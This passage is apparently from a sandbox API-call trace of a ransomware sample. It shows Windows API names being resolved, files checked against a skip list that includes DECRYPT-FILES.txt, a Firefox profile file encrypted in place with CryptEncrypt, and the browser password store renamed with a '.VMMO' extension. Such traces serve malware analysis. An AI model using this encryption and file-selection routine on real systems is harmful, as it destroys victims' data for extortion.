lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.149] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.149] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.149] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.149] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.149] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.149] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.149] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.149] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.149] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.149] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.149] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.149] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.150] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.150] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.150] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.150] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.150] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.150] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.150] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.150] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.150] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.150] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.150] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.150] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.150] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.150] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.150] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.150] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.150] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.150] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.150] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.150] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.151] lstrlenA (lpString="DELETEATOM") returned 10 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.151] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.151] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.151] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.151] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.151] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.151] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.151] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.151] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.151] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.151] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.151] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.151] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.151] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.151] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.151] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.152] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.152] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.152] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.152] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.152] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.152] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.152] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.152] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.152] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.152] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.152] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.152] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.152] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.152] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.152] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.152] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.152] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.152] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.152] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.153] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.153] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.153] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.153] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.153] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.153] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.153] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.153] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.153] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 102 [0082.153] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.VMMO") returned 107 [0082.153] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.VMMO" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.vmmo"), dwFlags=0x0) returned 1 [0082.154] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.154] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.154] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.154] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="DECRYPT-FILES.txt") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="autorun.inf") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="boot.ini") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="desktop.ini") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="ntuser.dat") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="iconcache.db") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="bootsect.bak") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="ntuser.dat.log") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="thumbs.db") returned 1 [0082.155] lstrcmpiW (lpString1="times.json", lpString2="Bootfont.bin") returned 1 [0082.155] lstrlenW (lpString="times.json") returned 10 [0082.155] lstrcmpiW (lpString1="json", lpString2="lnk") returned -1 [0082.155] lstrcmpiW (lpString1="json", lpString2="exe") returned 1 [0082.155] lstrcmpiW (lpString1="json", lpString2="sys") returned -1 [0082.155] lstrcmpiW (lpString1="json", lpString2="dll") returned 1 [0082.155] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0082.155] lstrlenW (lpString="times.json") returned 10 [0082.155] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0082.155] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" [0082.155] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0082.156] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=29) returned 1 [0082.156] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0082.156] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.156] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.156] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.156] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.158] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0082.158] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.158] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.158] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.159] CloseHandle (hObject=0x464) returned 1 [0082.159] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.159] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0082.160] CloseHandle (hObject=0x0) returned 0 [0082.160] CloseHandle (hObject=0x460) returned 1 [0082.160] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.160] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.160] GetTickCount () returned 0x114d03b [0082.160] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.161] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.161] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.161] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.161] lstrlenA (lpString="kernel32.dll") returned 12 [0082.161] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.161] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.161] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.161] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.161] lstrlenA (lpString="ADDATOMA") returned 8 [0082.161] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.162] lstrlenA (lpString="ADDATOMW") returned 8 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.162] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.162] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.162] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.162] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.162] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.162] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.162] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.162] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.162] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.162] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.162] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") 